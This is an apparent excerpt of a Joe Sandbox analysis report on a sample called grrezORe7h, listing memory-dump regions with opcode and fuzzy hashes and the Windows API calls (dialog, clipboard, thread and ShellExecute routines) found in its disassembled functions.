                                                                                                                      • Opcode ID: 46b3ff0aa3cb4299e6f9906b0f7957c2df3cf0d561536438229de91c3ef71d67
                                                                                                                      • Instruction ID: a7b62d398f3ac3cb941d6231261f715f4f985109e3b761a630180fec4da0a981
                                                                                                                      • Opcode Fuzzy Hash: 46b3ff0aa3cb4299e6f9906b0f7957c2df3cf0d561536438229de91c3ef71d67
                                                                                                                      • Instruction Fuzzy Hash: 4EC1C174E11258CFDB54DFA9C994B9DBBB2BF89301F1081AAD808AB354DB349E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 944841fb772e81018c05121c3292c44a8a60f9b956c85f0514a798e4c666cf88
                                                                                                                      • Instruction ID: 950123037169b1953d2818bfe64348c7f292b7453622a9795fd3fb425824809b
                                                                                                                      • Opcode Fuzzy Hash: 944841fb772e81018c05121c3292c44a8a60f9b956c85f0514a798e4c666cf88
                                                                                                                      • Instruction Fuzzy Hash: A5C1C174E10218CFDB54DFA9C994B9DBBB2BF89301F1091AAD408AB355DB35AE85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8c5bb447a31de339421603aeae5e4c6dcb50880867ccf40be8eea506c07e684f
                                                                                                                      • Instruction ID: d532b39c86cadabc9c3a7fc9b2f24c85eca021613fcc5a3d89e0c0f4ff7e0e18
                                                                                                                      • Opcode Fuzzy Hash: 8c5bb447a31de339421603aeae5e4c6dcb50880867ccf40be8eea506c07e684f
                                                                                                                      • Instruction Fuzzy Hash: E1C1C274E00258CFDB54DFA9C994B9DBBB2BF89301F1081AAD409AB355DB355E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 123767488a0df7f1cde1197ef1e7145bdcebe338f7d8d9c2f64aaf6017904bb6
                                                                                                                      • Instruction ID: fdd5b1cb911b1cce079270aab9c5a5cc04494afbd1b6e027165962737ccfbd12
                                                                                                                      • Opcode Fuzzy Hash: 123767488a0df7f1cde1197ef1e7145bdcebe338f7d8d9c2f64aaf6017904bb6
                                                                                                                      • Instruction Fuzzy Hash: DFC1D274E10218CFDB54DFA9C994B9DBBB2BF89301F2081AAD409AB354DB359E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: da614d9b2d6ca65385c4cbe2b9bbaf4363980a678d37e9c8424f66b3bf861997
                                                                                                                      • Instruction ID: 555073f751b1f6e210d66734a6554d4116597057eff83a5162a78ea60b1b61b2
                                                                                                                      • Opcode Fuzzy Hash: da614d9b2d6ca65385c4cbe2b9bbaf4363980a678d37e9c8424f66b3bf861997
                                                                                                                      • Instruction Fuzzy Hash: A4C1B174E10218CFDB54DFA9C994B9DBBB2AF89301F1081AAD808AB355DB359E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b1dc1fcb3724901363086bcc5b2e39eeb84bff4bae27213823f0b76394601e57
                                                                                                                      • Instruction ID: 51a0733874e072af1ca2a800cfef3c1ececd596b6f4c393b5db62eb9df4d9218
                                                                                                                      • Opcode Fuzzy Hash: b1dc1fcb3724901363086bcc5b2e39eeb84bff4bae27213823f0b76394601e57
                                                                                                                      • Instruction Fuzzy Hash: A6C1C274E10218CFDB54DFA9C994B9DBBB2BF89301F2081AAD809AB355DB345E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 4e5a2a01336cd47161351c75c99883de31e91787f32b51ff20c3d50af605490a
                                                                                                                      • Instruction ID: 1298aa78ffddee250130f42dd34375a3f9997db1abc11e598f14923f08a5d1fa
                                                                                                                      • Opcode Fuzzy Hash: 4e5a2a01336cd47161351c75c99883de31e91787f32b51ff20c3d50af605490a
                                                                                                                      • Instruction Fuzzy Hash: 17C1C274E00218CFDB54DFA9C994B9DBBB2BF89301F1081AAD808AB354DB359E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1bc86875790d04fc80a628cc03c8ee1ea5ed89f210061b204d0c82a1c89ae4dc
                                                                                                                      • Instruction ID: 0ae8a22942e3028c7b3f26d72869a3223faaf59a4736f1fe152487f2e2a2a48d
                                                                                                                      • Opcode Fuzzy Hash: 1bc86875790d04fc80a628cc03c8ee1ea5ed89f210061b204d0c82a1c89ae4dc
                                                                                                                      • Instruction Fuzzy Hash: EFC1C174E00218CFDB54DFA9C994B9DBBB2BF89301F1081AAD408AB355DB355E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 484c90ab0847c46aaf2f2649068c55ad4417073278b856207e2dfe86d2884199
                                                                                                                      • Instruction ID: b02d7f37f6a182b89b3bfdf31ae0c5ff13d51f86bc0486adf909fcc783f34cd5
                                                                                                                      • Opcode Fuzzy Hash: 484c90ab0847c46aaf2f2649068c55ad4417073278b856207e2dfe86d2884199
                                                                                                                      • Instruction Fuzzy Hash: 89C1C274E10218CFDB54DFA9C994B9DBBB2BF89301F1081AAD809AB355DB356E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3b35c7f665db389b09e65d375685b59704e35632d859851f75c6eca1bc7b382f
                                                                                                                      • Instruction ID: deb61287a58cbd5f96fb2ed62ce0ec7f260163ff2884675b763de4f6ddab9505
                                                                                                                      • Opcode Fuzzy Hash: 3b35c7f665db389b09e65d375685b59704e35632d859851f75c6eca1bc7b382f
                                                                                                                      • Instruction Fuzzy Hash: 8AC1C174E00218CFDB54DFA9C994B9DBBB2EF89301F2081AAD808AB355DB355E85CF51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014993362.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_373a0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 76e1241ca701b749bbb35e788320314259db3703a4344909b69b7a8aed13e3e7
                                                                                                                      • Instruction ID: 7337c8903222ecf1d4bf850749e34ab2bfe4910bfd306ce42d305533facc7f5b
                                                                                                                      • Opcode Fuzzy Hash: 76e1241ca701b749bbb35e788320314259db3703a4344909b69b7a8aed13e3e7
                                                                                                                      • Instruction Fuzzy Hash: FFC1C174E10218CFDB54DFA9C994B9DBBB2BF89301F1081AAD409AB355DB35AE85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9c7006a33bae5507f1d7d77f1286ca1e158107aac1058ea5a431d669e68f0326
                                                                                                                      • Instruction ID: 534e7a41747923aef663d9bbe216d6e97cbd1996d18ac8cd80de29f3bf0d9fd2
                                                                                                                      • Opcode Fuzzy Hash: 9c7006a33bae5507f1d7d77f1286ca1e158107aac1058ea5a431d669e68f0326
                                                                                                                      • Instruction Fuzzy Hash: D1C1C174E00218CFDB14DFA9C994B9DBBB2BF89301F2081AAD809AB355DB345E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2c7adec9e02099f5698999bbd970f9b6a0292a34f9b34107211ed29bb2b01c07
                                                                                                                      • Instruction ID: 8f91301d8ba5a1e9de0383cea464d5ed590d4c487f33e44937df032bf1a94048
                                                                                                                      • Opcode Fuzzy Hash: 2c7adec9e02099f5698999bbd970f9b6a0292a34f9b34107211ed29bb2b01c07
                                                                                                                      • Instruction Fuzzy Hash: FDC1C274E00258CFDB14DFA9C994B9DBBB2BF89301F2091AAD408AB355DB349E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 48bde519db541b1e6d27b536f6d45c2d1a70fdd4f6908d67562c2b173bc1fb59
                                                                                                                      • Instruction ID: c7bcc0e2cef131795e1cbc3fab5d05ca3fb02ddd1490b70dbeb6866ad64bf420
                                                                                                                      • Opcode Fuzzy Hash: 48bde519db541b1e6d27b536f6d45c2d1a70fdd4f6908d67562c2b173bc1fb59
                                                                                                                      • Instruction Fuzzy Hash: 85C1B274E01228CFDB14DFA9C994B9DBBB2BF89301F2091AAD409AB354DB355E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1544396a9acaa05b5ffa6ec6c302c4d91b097204848346af0cd834197dd7faa1
                                                                                                                      • Instruction ID: db69975976d6481ea055e0603685293c7ef0748c19b6dfa09cac8e3edda07059
                                                                                                                      • Opcode Fuzzy Hash: 1544396a9acaa05b5ffa6ec6c302c4d91b097204848346af0cd834197dd7faa1
                                                                                                                      • Instruction Fuzzy Hash: 66C1C174E11218CFDB14DFA9C994B9DBBB2BF89301F2091AAD808AB355DB345E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 143a4117bd8bccf817e6e83011f7eb7e0f09183f95bd164a228e2408a10b12e1
                                                                                                                      • Instruction ID: ac42019145f7977e0314efe4427dae2a36e582c8beb318db3db4d0af1d1ed2b1
                                                                                                                      • Opcode Fuzzy Hash: 143a4117bd8bccf817e6e83011f7eb7e0f09183f95bd164a228e2408a10b12e1
                                                                                                                      • Instruction Fuzzy Hash: 4FC1C174E10218CFDB14DFA9C994B9DBBB2BF88301F2091AAD808AB355DB355E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 84ef86fc0e395f9b82521366f0ded9ec1542535eeb598273722978faff109925
                                                                                                                      • Instruction ID: 47c81f540c1b2c85260a1b6f51665f25d49ab48c414deca30b6f08ab1334c4cc
                                                                                                                      • Opcode Fuzzy Hash: 84ef86fc0e395f9b82521366f0ded9ec1542535eeb598273722978faff109925
                                                                                                                      • Instruction Fuzzy Hash: F4C1A074E10218CFDB14DFA9C994B9DBBB2BF89301F2091AAD408AB355DB359E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7fbf2248c0ef757d950ba6bca0f245e7b08dcb9f00606ec1f53ba2abf0c6e439
                                                                                                                      • Instruction ID: 2515bbd0df0774dc6b670dc19f77007eb0cc282650dd3063fde0fb4d681c3992
                                                                                                                      • Opcode Fuzzy Hash: 7fbf2248c0ef757d950ba6bca0f245e7b08dcb9f00606ec1f53ba2abf0c6e439
                                                                                                                      • Instruction Fuzzy Hash: 2AC1C174E00218CFDB14DFA9C994B9DBBB2BF89301F2081AAD409AB354DB359E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e92d579822f7eac4c833dc77c745b2096516755f12f5a5cf1b6b25b1fef77626
                                                                                                                      • Instruction ID: d14bf177dfffe21cd9cb5a71b5b80d22f121ad85da0c88da5713552854734543
                                                                                                                      • Opcode Fuzzy Hash: e92d579822f7eac4c833dc77c745b2096516755f12f5a5cf1b6b25b1fef77626
                                                                                                                      • Instruction Fuzzy Hash: D3C1C174E00218CFDB54DFA9C994B9DBBB2BF89301F2091AAD408AB355DB349E85CF10
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7c6cc2ab1e32e45f0d2512e344a770ae73d92d02caebba4a936da583389fd50d
                                                                                                                      • Instruction ID: 1c33ff885311790b1ef09702766d5909a1fff34f218799dac479dd7eea09b5d4
                                                                                                                      • Opcode Fuzzy Hash: 7c6cc2ab1e32e45f0d2512e344a770ae73d92d02caebba4a936da583389fd50d
                                                                                                                      • Instruction Fuzzy Hash: 98C1B174E10218CFDB14DFA9C994B9DBBB2BF89301F2091AAD408AB355DB359E85CF11
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.3014695900.0000000036EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36EC0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_36ec0000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1ed41f1ac5ec68763d7d02643f81abe4e7dd0a8f1e2dd9f1744f2d9c1c28acca
                                                                                                                      • Instruction ID: 7c930629c49cef1895bf8450044c76a74f31455feeb4e74ea64518e4250c0686
                                                                                                                      • Opcode Fuzzy Hash: 1ed41f1ac5ec68763d7d02643f81abe4e7dd0a8f1e2dd9f1744f2d9c1c28acca
                                                                                                                      • Instruction Fuzzy Hash: 8EC1B174E10218CFDB14DFA9C994B9DBBB2BF89301F2091AAD409AB355DB359E85CF10
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                        • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                      • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                      • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                      • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                      • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                      • CloseClipboard.USER32 ref: 00405676
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                      • String ID: {
                                                                                                                      • API String ID: 590372296-366298937
                                                                                                                      • Opcode ID: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                      • Instruction ID: bedd14c977596f777f0676ed5d78e17ab23f6a1f4e688fc8743dda88f8352f2f
                                                                                                                      • Opcode Fuzzy Hash: c03f886d1af96994fdbb0a23cef68d0ed2242977acd76286432e3196303c0609
                                                                                                                      • Instruction Fuzzy Hash: 85B15A71900608FFDB11AF60DD89AAE7B79FB48355F00803AFA41BA1A0CB755E51DF58
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                      • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                      • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                      • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                                      • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                      • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                      • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 184305955-0
                                                                                                                      • Opcode ID: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                      • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                      • Opcode Fuzzy Hash: 1f500e8277606cc2b60b0699cfffcfb82421e5b85fdc00a0e0ef9cc185334c76
                                                                                                                      • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D
                                                                                                                      APIs
                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                      • GetSysColor.USER32(?), ref: 00404396
                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                      • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                      • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000004.00000002.2989377915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000004.00000002.2989363633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989394400.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989410687.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000004.00000002.2989435001.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_4_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                      • String ID: -B@$N$open
                                                                                                                      • API String ID: 3615053054-1057335957
